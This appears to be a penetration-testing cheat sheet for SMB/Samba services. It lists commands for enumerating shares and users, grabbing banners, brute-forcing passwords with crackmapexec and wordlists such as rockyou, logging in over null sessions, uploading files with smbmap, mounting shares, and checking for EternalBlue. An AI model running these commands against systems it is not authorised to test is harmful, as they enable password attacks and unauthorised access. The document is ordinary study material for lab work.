SMB-Samba 135-139 445
#NMAP
#Metasploit
use auxiliary/scanner/smb/smb_enumshares
use auxiliary/scanner/smb/smb_lookupsid
#Banner grab
nc -nv 10.11.1.5 135
#Crackmapexec
crackmapexec smb --help (smb specific)
crackmapexec smb 10.11.1.128
crackmapexec smb 10.11.1.128 -u 'username' -p 'password'
crackmapexec smb 10.11.1.128 -u "DJ" -p /usr/share/dirb/wordlists/mutations_common.txt
crackmapexec smb 10.11.1.136 -u root -p /usr/share/wordlists/rockyou.txt
crackmapexec smb 10.11.1.146 -u 'guest' -p '' #null session
crackmapexec smb 10.11.1.146 -u '' -p '' --shares #listing available shares
#rpcclient
rpcclient -U "" -N 10.11.1.5
#Ridenum
ridenum.py 10.10.10.10 500 50000 dict.txt
#dictionary bruteforce of users
#Null session
Windows:
net use \\10.10.10.10\ "" /u:""
Linux:
smbclient -L //10.10.10.10
#nmblookup
nmblookup -A 10.11.1.5
#nbtscan
nbtscan 10.11.1.5
#Smbmap
smbmap -H 10.11.1.5 -P 135
Login with creds:
smbmap -u "root" -p "123456" -R Bob -H 10.11.1.136 -P 445
smbclient -L 10.11.1.5
smbclient //10.11.1.5/guest
smbclient --no-pass -L //10.11.1.146
#null session
smbmap -H //10.10.10.10/ --upload test.txt /SHARENAME/test.txt
#upload file
#Bruteforcing
#smbget
smbget -rR smb://192.168.101.83/sambashare -U guest
#Eternalchecker.py
https://github.com/3ndG4me/AutoBlue-MS17-010/blob/master/eternal_checker.py
clone repo and fire off against target , POC for Eternal Blue Vuln
#Mounting shares
Creating a temporary share folder in /tmp (kali)
sudo mkdir /tmp/share
Mounting the share
sudo mount -t cifs //10.11.1.146/SusieShare /tmp/share
Last updated